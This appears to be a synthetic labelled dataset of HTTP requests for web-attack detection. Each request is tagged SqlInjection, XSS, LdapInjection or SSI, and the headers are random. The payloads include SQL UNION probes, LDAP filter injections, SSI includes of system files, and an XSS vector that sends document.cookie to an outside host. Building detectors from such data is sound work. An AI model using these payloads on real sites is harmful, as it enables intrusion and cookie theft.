GET /lzt/rt0iyc/CPzEl@Mw2/kn/tak0QG_yh.p3Q@p/1GorJROcjR/eKFR.mdb?iahegUk3u=nedassht0srem&anenTe7tenrdi=s%3Bn&mincludewWshome6UJ=03&0uoycW=ftpitxtthlinksr%295sbRnp&ltnn0nebnnedtl=1414705&8eosubeemapn9=150245&jcZ=381268&yJuQDqfU=0059108335&ece24p=tbintzeen&imqwheetUtni=r1DIeHWPEd&eba2oafReapmdeo=epM%408&trWt8cmf=%5Cautoexec.bat HTTP/1.0
Host: www.kgtasm.net
Connection: wcaop
Accept: text/plain
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: o8ehd-iiTmiNsr, nendtn-0h8i, oa0eyaRi-ee, oNase-tddato;q=0.0
Cache-Control: max-stale=89557
Client-ip: 140.87.76.152
Cookie: ifiRck=0097819;AjM.V=gDz;risoccanhfxleg=gYl.5
Cookie2: $Version="69"
Date: Sun, 15 Feb 09 04:00:43 UTC
ETag: W/".l1xi4XzvcD1Rn.Isdt"
Expect: nSnorec=amMwieb;4mydye
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 17 Aug 09 12:59:29 CET
If-Unmodified-Since: Sun, 18 Feb 07 11:38:15 UTC
If-Match: "ZHPJIOmFl2_PVNMY_ju"
If-None-Match: "iu--L._yPi58KBBKeE"
If-Range: Wed, 03 Mar 10 12:32:05 GMT
Max-Forwards: 4
MIME-Version: 5.0
Pragma: h='atesEno'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic b3JhZWQ6ZWhhb0o=
Range: 709-485
Referer: http://www.de28lm.ch/isnn/alsn/sammhew/e8OgoaK4.rar
TE: gzip,trailers
Trailer: If-Match
User-Agent: 6itN (tiPjtsi9; dVxa7bd; n2PQFI)
UA-CPU: PowerPC
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: 5.8 www.z8hmu.jpg, uie0ru/3.3 www.ixct1es.tiff, 6.4 www.tedtxer.jpeg
Transfer-Encoding: gzip
Upgrade: oeii/7.9, Txls/7.6, uci2it/8.1
Warning: 503 230.183.212.133 "reoem7gfiotv8mdeeL0V" "Sat, 30 Jan 10 17:01:26 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36048
Start - Id: 42790
class: SqlInjection
POST /geSxf/e9na5mgt0dsfgau/mJFDx6/o7kHhFf9bvLnQ4N0auD/57XVEy9bgsoundu/zmoasTatEdr6Eses/0eRf.7KwlyH/oz.css? HTTP/1.0
Content-Length: 152
Content-Language: nrehAeH,eeIiome,istoitl
Content-Encoding: compress
Content-Location: /icoMe3ej/nsmbuh/inaafej/bs27r12.dll
Content-MD5: enRsakNSdWFIYUllSU9kbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Oct 05 14:15:30 UTC
Last-Modified: Thu, 20 Jan 05 05:49:26 CET
Host: 155.165.242.105:58962
Connection: hlthc
Accept: image/png, video/*, image/jpeg
Accept-Charset: windows-1257;q=0.0, x-mac-ce, x-mac-cyrillic;q=0.3, windows-1250
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 106.46.255.142
Cookie: ahrhrm1=and    0<>(select     count(*)    from rhasGTwo     where 6iedDtio<>)
Date: Fri, 23 Jun 06 15:36:55 UTC
ETag: "cgY.nDUdJO7yjzxPF_"
Expect: 100-continue
If-Unmodified-Since: Thu, 08 Dec 05 15:52:53 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 04 Jun 04 18:05:19 GMT
Max-Forwards: 44
Proxy-Authorization: Basic Y2RhQWlpUmY6Mm5PY2h3dHA=
Authorization: Basic cTJlTnJlOm5hdTRs
Range: 866-,2-448736,67150-78210
Referer: http://schge.it/iirfe/aDoiI.avi
User-Agent: Mozilla/5.3 (X11; U; Linux i386 7.2; di-dl; rv:6.0.6) Gecko/15324893
UA-Disp: 5034,6041,16
UA-Pixels: 952x987
Transfer-Encoding: identity
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6zgA4XQiYAaP=6091277764&mw8n=uTeeeinyn&sErrro=811567&sae4gi=86032323&loerls=ohhctrdu7&execd-pp5LF=moeYvlosont&5hSSfKdrop4=on|iiehoii$sao9ETmocha@f

End - Id: 42790
Start - Id: 47408
class: XSS
GET /aSh8LSE1_Uteg1UhGvhl/tT0p_@7igbQXKrC/gUZ/objecty.r/eT3.A559UjUOFEL1A/hzKTU-HwVrnDvannv4NO/efGHb120BOHjCy/nXkzuWMDTlZG.bin?si0sivslee=ncsoezpftpoE&xslltidi9=%3Cbgsound+src%3D++%22+++javascript%3A++++%5Balert+++%28%27anoeoh%27%29%3B%5D+%22+++%3E&sm=i2oe&2mwe=3668002030&So=1tkfEa%25ee&dosagaeratc=oWk_RI5NO&betoaeniudyo=be&sazeD=lib6+n%3Bhdwp-i%3Ceunionmmeta&lauitmiaenetlro=1nodeey&tnranbegstt=e2gtenifti&nht5hrkf08e8=1&frnaddtk=7&wvd1nh=dtnddSZcr2c&e7rtao=aiUemoEad&41ntceetio3n=tbt HTTP/1.0
Host: 29.81.47.187:80
Connection: keep-alive
Accept: video/*;q=0.2, application/rtf;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=544
Client-ip: 71.102.4.108
Cookie: ndecr9mjemjoSe=lJm;h7zonpTbiIxhioo=vs;stsiET1zr=oltk;g7qiNen2nw5=& g9y;eiepnleohholb=1013683;jri0ptloTo=de4@.gPQs.
Cookie2: $Version="13"
Date: Thu, 28 Dec 06 20:37:39 CET
ETag: "QC@xK6DAF--MsECTF3G"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Sun, 08 May 05 02:59:54 UTC
If-Unmodified-Since: Wed, 18 Jul 07 07:02:00 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: "solF7VIyXH05lmym"
Max-Forwards: 423
MIME-Version: 0.3
Pragma: tziO=et
Proxy-Authorization: Basic ZW5jU3JiaTpwQWFvcmU=
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 2506-,-467
Referer: http://www.goelr0e.cz/ttaaeta.tiff
TE: trailers
Trailer: If-Match
User-Agent: tzay (iftFOcj; l43z9d; rtLmbrO)
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/4.5 14.95.43.253
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 308623860722322067
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47408
Start - Id: 38871
class: LdapInjection
GET /hpbmn8hbi/sGU@3T.0T@nmyj@dapLZ/NynN/zwhereLdBAQ/jai2irlq16u/9R0GrT8srq2727E_EEY/chioauchNSneutchmr/dejo3uahrdona1e9lts.html?5O=ash&YSadminF=neZJrML9D%40&ctnstbiiexC=oFV-iI&@7Bepd9=576&iicoaeeabiWn=%5Ctr+8tl33t6ts8t&nvpeaolkeehg=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&2Spotesomain=EY&oo=gtea%3F&eeege=iqC&the1=t2yzAcB8eOJ&rP7daiee3t=selectuuIhajdti&a1fo=4Otrualruni2eiR1&5d=hTnfT%3B&r9nsoRn=2%28+ HTTP/1.0
Host: 105.53.44.59:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 9.41.106.201
Cookie: passthruViX=621854;Rspar=irCghp;9iHzoahhsotg=41;r23retiwp7pme=dXFloKY_uQwA;ipositionHwt7OU2=j5n3ete5oesheca
Cookie2: $Version="37"
Date: Thu, 11 Aug 05 08:46:47 GMT
ETag: "OCfbQBx-AQOh@IfI"
Expect: 100-continue
From: w08rh3@rpehekeyi.com
If-Modified-Since: Fri, 06 Feb 09 23:41:50 CET
If-Unmodified-Since: Wed, 21 Nov 07 16:46:54 GMT
If-Match: "D9wzoLRtv5iXYRP"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: Basic YXR1RDpmOXJsZW4=
Range: 15934-,799-8058,-81465
Referer: /eprstld/isuaedm.cgi
TE: trailers
Trailer: Via
User-Agent: Mozilla/6.1 (Windows; U; Win98 3.0; s0-qf; rv:5.0.2) Gecko/48088316
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: FTP/7.1 79.207.205.44:9442, oha/3.8 174.169.124.245, 0.3 www.t0nrnp.jpg
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 208 www.eiujur.shtml "niihn9Buntieeetne0nn" "Tue, 17 Oct 06 02:46:38 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 706863
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38871
Start - Id: 40525
class: SSI
GET /faafe/hJxa93pn@zK/ccBLo@lCvK0FYG.EV/Rcdkilwpiieye8.php3?leh7ne=m-deet&PpU97J5PGFU=r%29s&iJn=540781&pDRm8Y5we=r&hrt=00286&vToimg=nNQd_3y&genreTtvxtc=edQt7SCb5l9z&C_wHPMUpuyv=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&gtr2NnedGsg=Piot&sSKtc3-A=euXlnhtpya3nneNa&cEca6hh=m&96etelnetnNOx9=Di+i HTTP/1.0
Host: www.ntee6.it
Connection: ldrrntoe
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, windows-1255, cp-950;q=0.0, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 109.86.93.38
Cookie: glaZMN13NS=seof Ee/;id6biaahih=718835;ekenthsWthFaiE=xnv oeaW;noy=fjTiwt
Cookie2: $Version="51"
Date: Sun, 08 Aug 04 06:51:36 UTC
ETag: "G5thXp8xs5cDE.veI"
Expect: 100-continue
From: OeTsa@undhtsdpd.it
If-Modified-Since: Wed, 29 Oct 08 04:15:30 CET
If-Unmodified-Since: Tue, 25 Jul 06 06:04:29 GMT
If-Match: "@ONyKZ6B4YJ@dn3o1"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.5
Pragma: eawgecu=ect
Proxy-Authorization: dler dcyii=syes
Authorization: Basic amM0eDp0dklxb2F0ZQ==
Range: -112429,931-60
Referer: /setpc/en13teo/liiT.tar
TE: gzip;q=0.7,chunked,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (X11; U; Linux i386 4.6; 9r-7I; rv:8.1.9) Gecko/27321266
UA-CPU: Sparc
UA-Disp: 591,998,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3342x1111
Via: HTTP/9.4 223.208.124.154
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 61054598804485092045
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40525
Start - Id: 35308
class: SqlInjection
GET /iAOZ./cey6ea/cir/g4MtEJrV13rVrf7/1YtvjV1QErBYlq9Joj/lEpa-v1PR-PW2uM/eN0-3Z0RX48cf3Omocs/QMomailZXaTu/4paoscil0seanrsm6k/tNqqVMtLe@PBjj3bs8.jpg?weteSh=iueoaeqEccNsopeneustyleem%3C&0enes=%27++%29++UN%2F**%2FION+++++ALL+++SEL%2F**%2FECT+%27rgc%27%2C20448%2C3892%2C%27tpdhnnbi%27%2C9+++FROM+shgni+++WHERE+++++%28+%27%27+%3D%27&oaH3bnirae=6208648&mwfsuhiboaw2sc=3%2B%3CapHsilh&n5t0X=tgae&u5t4nJhas85emn=sti&eOslolr=h HTTP/1.0
Host: www.ciis.st:0417
Connection: keep-alive
Accept: audio/*, image/*
Accept-Charset: iso-8859-8-i;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=9436
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Sat, 07 Nov 09 17:37:43 UTC
ETag: "XhnahbLsp63w2wtblrc"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Sat, 16 Jun 07 05:14:19 CET
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: "UZcdnfx8.OFJUnD"
If-None-Match: *
If-Range: Sat, 05 Dec 09 18:43:51 CET
Max-Forwards: 583
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Digest nonce
Range: 165737-,1988-39961,-87
Referer: /cei9siiv/TdahHaR2/nd5Anrzi/AAen8.jpeg
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: siotwumaatfoehu
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 4.6 www.tt6stIna.jpg, m2csxs/6.3 251.234.127.11
Transfer-Encoding: compress
Upgrade: dzlnt/9.5, oo3l/2.4
Warning: 727 226.166.210.3 "etaemlotia" "Mon, 31 Jan 05 16:57:11 UTC"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35308
Start - Id: 40566
class: SSI
GET /temznldeeexlam9/vx7R4uueJ/daDhErr/ow-3fA/-dlsaZ8h2IMu/systemE@QPM/KXaOg1WCnullnC/hXkZ/zseEgadtoshoeshihth/Rf8T1group byO_hsE/nz4@ZEd.jpg?nh=%3C%21--++++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&aod=lfig74tiietvrbe HTTP/1.0
Host: 164.195.151.138
Connection: ii5akio
Accept: text/plain;q=0.9, video/*, application/rtf;q=0.9
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *
Accept-Language: nufc6sde-nnoAjeor, tif6r4fS-swra, mrs1m7k-c;q=0.0, edAzrl-csr;q=0.9
Cache-Control: max-stale
Client-ip: 65.35.166.11
Cookie: snavpdklhsemMl=eaAposition;oeioawktrr=te3o2r7ssnedt;ie7=1163514;6hFvwL1rotiOt6T=riesWiqt7sfs8hThm
Cookie2: $Version="84"
Date: Tue, 10 Jan 06 08:34:20 UTC
ETag: "oUtUHSbKf0E9Y3DTy3L"
Expect: Dmgzlepg=aTdpeoAa;8eizrast=eadti
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Sat, 28 Feb 04 14:00:49 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: *
If-Range: Mon, 09 Jun 08 20:50:18 UTC
Max-Forwards: 14
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest algorithm=MD5-sess
Range: 488078-9765
Referer: /orntg/srhnNd/marmre/ysee/ietothg.sh
TE: gzip;q=0.1
Trailer: Host
User-Agent: Mozilla/1.2 (compatible; MSIE 7.9; Win98; 2dGte2isbN; trOcees; netwArltdn)
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.7 186.126.110.155, 3.0 204.172.153.35
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40566
Start - Id: 35193
class: SqlInjection
GET /vHZK@oJIH19E7hy1t/IeRyxh1iiei/tcirdmu3s/eitaeetRewrpextE/tm810AoT7hdGr6/7zJaF/elnelabtTlch9cpe/ientIia1rdd5e4/iyxmham/bh5narEeveEr/wTn/radMwco.gif?fiAar=4ei&rglhd=nRjf&9odwuafeanTn=3377&osbtenuitoa=eaboonl&tlaLrcetehtuS=ml0&JKIi1KwjPm=2Nseulpmweaaav0&bUtetcrtzfN=2455&fekctwhEw=e1r%29a&coo6ghaOhhi=tFZvS&en4tw=54735922&Mtekbnrny1ve=+n6h+tdeallve%5CeAe&ottsi4haih=932&lmntaSnQay5d=fk-XzX&oetaCipapYnfga=%27+AND+++USER_NAME%28%29%3D%27sh0b HTTP/1.1
Host: www.n5crnc.com:4
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=02281
Client-ip: 152.5.100.151
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Wed, 02 Nov 05 01:38:44 GMT
ETag: W/"rkmrqWzMIAo4xOQIZj"
Expect: 100-continue
From: ei5rasmn@Is8otu4t.com
If-Modified-Since: Sat, 21 Jul 07 11:51:13 CET
If-Unmodified-Since: Tue, 15 Jan 08 01:24:54 GMT
If-Match: "bH_z2484.wYy1gh"
If-None-Match: *
If-Range: "vn8JZctg-JyZFwh"
Max-Forwards: 169
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM MWx1eHRhc2VpZWJycm53ZXRlU2lydGFvbDFhZ3RuYm90ZXRu
Range: 7416-9436,-80
Referer: http://www.aFyd23fd.st/spstiymo/ylaptieP/ero7s.swf
TE: chunked,chunked
Trailer: Accept
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 8.9; ta-is; rv:4.8.2) Gecko/17512748
UA-CPU: StrongARM
UA-Disp: 1678,192,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: HTTP/8.3 www.cHheomS9.png:556, yIatR4/9.1 www.nhsNB.tiff
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35193
Start - Id: 38597
class: LdapInjection
GET /t3osssuEtesherl0isA7/i8yhs/8eiMo/itmMtwulk/ie9E.jpeg?B0doFCxnclJetc=%29%28+%7C++++%28++++cn%3D*o++%27brien*%29%28mail%3D*o+++%27brien*+%29++&yetmn=rlf&tehbteotnefe=+havingi&Ip6edho=gikB4D5Gr&helelxaeleia6t=access_logeIAtdlasmEaa&rotn4oON=fltt7eal%5Dsock_streamttB%2Fbaarr&1oect6=aUrces HTTP/1.0
Host: 215.97.187.195
Connection: EtU87ma
Accept: text/*;q=0.6, text/html
Accept-Charset: koi8-r, x-mac-turkish
Accept-Encoding: compress;q=0.6, identity;q=0.9, gzip
Accept-Language: sa4i3o-Sndota;q=0.1, sd-b
Cache-Control: min-fresh=24338
Client-ip: 158.4.8.166
Cookie: tnospqlsi7=NisS3j0o5eikhttps5;f6aekp=931908584
Cookie2: $Version="7"
Date: Thu, 09 Jun 05 12:35:35 UTC
ETag: W/"O.bTOUSMU2LLu9X"
Expect: 0saert
From: Henr0sl4@nexht.fr
If-Modified-Since: Fri, 05 Mar 10 21:06:24 CET
If-Unmodified-Since: Mon, 24 May 04 23:58:04 UTC
If-Match: "Mzkuq8S0k7I0WV5B9nYe"
If-None-Match: *
If-Range: Thu, 20 Jul 06 06:10:57 UTC
Max-Forwards: 675
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM ZGFyVHN0MWxpYW5nZWxpcDBuc3JyYWZldGV5aWJhbDVuZWQ=
Range: -348176
Referer: http://rrotoum0.ch/rtliacUu/azeol/eTou/irnaa/hdeat2.asp
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 8.5; aq-ja; rv:1.3.5) Gecko/69772083
UA-CPU: 68000
UA-Disp: 761,265,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: ihxoo/3.5 6.235.48.222, 3.4 www.nein.htm, 2.8 6.102.206.184:103
Transfer-Encoding: deflate
Upgrade: o9ttnl/4.2, 5tnn/9.6, rmt/0.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38597
Start - Id: 36958
class: LdapInjection
GET /eSWAw/at6Edoueh9oza7t.asp?divSGL-=ssibms7&JM1H=253601&pd5etEoYhcx=ec5botoigroup+byiSost&bWDyF=oPSIRTTlQdXv&eA7n8Envzspye=2t8enslpd&ospicmqClmudeo=5925393&tmrmnadc7at6bl=Iup&taageottd=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 215.172.176.196
Connection: close
Accept: application/rtf, text/xml;q=0.7
Accept-Charset: iso-8859-1;q=0.0
Accept-Encoding: compress;q=0.2, gzip, deflate, gzip
Accept-Language: *
Cache-Control: cl3g4m=8ar
Client-ip: 113.131.200.174
Cookie: hhltemi5rNg=ibiiys7nb;ids6ecnpaieur5=n7YM--5STEb;wyhtcot1lDs1kNk=sexecelraOatT;no7nox=567551720;uttibMysprrcaPz=xRo r
Cookie2: $Version="041"
Date: Tue, 05 Aug 08 23:55:50 CET
From: qette0@etdR6.ch
If-Unmodified-Since: Wed, 28 Jan 09 18:05:54 UTC
If-Range: *
Max-Forwards: 4093
Pragma: atmIa=xmmn1aa0
Authorization: Basic dXFzZWxoZjpkaWlzU2Vt
Referer: /ie2yrSth/EoT2ii.jsp
TE: gzip;q=0.0,trailers
Trailer: Range
User-Agent: Mozilla/8.8 (compatible; Konqueror/7.8; SunOS sun4u; nraseucrL)
UA-CPU: Sparc
UA-Pixels: 8538x2200
Upgrade: sroaR/6.6, heg6/1.0, edrN/4.6
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36958
Start - Id: 40471
class: SSI
GET /B3n6pt/4O1e/1CvGyp99fSDjT._j_.htm?avalr05en3Fe3e=12&endmiqSat=5782&ctb6tehd=%27%3D6etmp&euot=sstlotoerfh%24c&mcK1OR=%3C%21--+++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&SaxeahNaRg=psstobreu&1rnt=8&83yyiWystr5a2=childjyy HTTP/1.0
Host: 54.128.181.206:313
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312, iso-8859-9, windows-1250;q=0.1, shift_jis;q=0.7
Accept-Encoding: gzip;q=0.7
Accept-Language: ase-vokA, d2y2tnke-de
Cache-Control: max-age=9510
Client-ip: 170.198.138.67
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Mon, 16 Feb 09 21:46:11 UTC
ETag: W/"fAWBVr05qijQem_WNf"
Expect: dnpeof=aR6EAn;vweQn
From: Yma7@5eefcOthto.biz
If-Modified-Since: Thu, 22 Jan 09 17:10:47 CET
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "c04HdilrvQsbnHtdD"
If-None-Match: "FnFD0yMoY5NnEuwc"
If-Range: *
Max-Forwards: 0793
MIME-Version: 6.5
Pragma: sgerTp=ansolnO
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Basic Nm55ejprYm9lc2w=
Range: 6740-758,0802-
Referer: /covuelsi/iliv/SnO1/iefa6Et.css
TE: gzip;q=0.1
Trailer: Date
User-Agent: Mozilla/0.9 (Windows; U; WinNT 9.3; ho-ea; rv:0.8.8) Gecko/84197942
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: 5.8 www.fHTfg.tiff:58874
Transfer-Encoding: nsedaj
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40471
Start - Id: 38524
class: LdapInjection
GET /d4IG-Q8u8x/ra3xarel/oiFmiGFqmPsnBbzD/snrdIqsRd@/ijV@7.cUDdhPkN2/t.7VkAmq6-EemZmLtF/aloiajHRxKylU@TxIIYm/sFccFB.js?pLi0kznka=%29+%28++%7C%28displayName%3Dhad*%29%28name++%3D++had*++%29%28++++mail%3Dhad*+%29 HTTP/1.0
Host: 2.197.88.138
Connection: close
Accept: text/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=46
Client-ip: 127.100.106.138
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="13"
Date: Sun, 08 Oct 06 06:45:53 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Thu, 19 May 05 04:33:52 UTC
If-Unmodified-Since: Fri, 24 Dec 04 13:42:47 GMT
If-Match: *
If-None-Match: "qZ_T8Gy3tgGXF-gmB"
If-Range: Sun, 14 Feb 10 24:35:07 UTC
Max-Forwards: 702
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ue6yrirt"
Authorization: Basic cmhoQTppa2xpaG9l
Range: 548411-,-37195
Referer: http://www.TnnO.com/Lhiely6b/edEtt/dgOFatl.msf
TE: deflate;q=0.3,gzip
Trailer: If-Range
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 3.9; mf-uk; rv:1.7.2) Gecko/71516488
UA-CPU: MIPS
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 1.4 www.2tohmsp.jpeg:2525, 8.3 56.150.54.160, FTP/8.1 1.222.205.253
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 149 www.nAoht.css "snts" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38524
Start - Id: 48207
class: XSS
PUT /dzHjGAefdRaNL9xn/ODZa_R183uhavingV/ywO..QJGNGAEuNiUEPB/rherbco/9r-qJgs/ba8oFh2i5hc.asp? HTTP/1.0
Content-Length: 193
Content-Language: fit
Content-Encoding: deflate
Content-Location: /nhsm/ottmirg.fgf
Content-MD5: MWhhc3F0ZWhhYWVobGluZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jun 08 03:25:41 CET
Last-Modified: Fri, 16 Jan 04 23:42:55 UTC
Host: www.qmli.uk
Connection: keep-alive
Accept: text/*;q=0.5
Accept-Charset: shift_jis;q=0.9, iso-8859-1, iso-8859-4, iso-8859-3, iso-2022-jp;q=0.2
Accept-Encoding: <img   src  =  "    re    >"   onmouseover    =    "     [document.location.replace ('http://www.stenchti.com/cgi-bin/chnditer.cgi'+document.cookie);]    " >
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.134.185.197
Cookie2: $Version="2"
Date: Thu, 10 Jul 08 11:05:58 GMT
ETag: W/"DTPVKZ_U4E2_B6CmD"
Expect: iQbird
If-Modified-Since: Thu, 30 Jun 05 01:39:40 GMT
If-Unmodified-Since: Fri, 18 Jul 08 15:16:18 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Jan 08 24:05:01 CET
Max-Forwards: 0
Pragma: oohi=jsll
Authorization: Basic YUJlaWV1OlNwYWw=
Range: 4584-,03889-
Referer: http://ahCc.st/tntx/pdd6ti/szyxne/dtou7p.shtml
TE: deflate,gzip,trailers
User-Agent: Mozilla/1.8 (X11; U; Solaris 2.4; hg-AO; rv:0.9.8) Gecko/40642728
UA-Pixels: 2557x0166
Via: HTTP/1.1 www.auht.jpeg, 3.6 www.POAilao8.css, HTTP/1.0 186.252.91.154
Transfer-Encoding: tfctod; eA5e7l=nee9
Warning: 893 78.20.40.155 "h9rlthiE7eebet5grc" 
X-Forwarded-For: 16.22.84.83
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bJRqlns1yc6j=shZlMTKh@Wc&eni=diiusgsdntea&wdhqygIe7egoLgR=n+runionti9enz=n&hzeotaer=A:mn&oomoatv=17047248&2opasrhu=euht4flda&xatodaoeiinn=5349&oaewmaEeh=o&nswcse4rhhH=8&kaqbEj27sd=79521

End - Id: 48207
Start - Id: 38180
class: LdapInjection
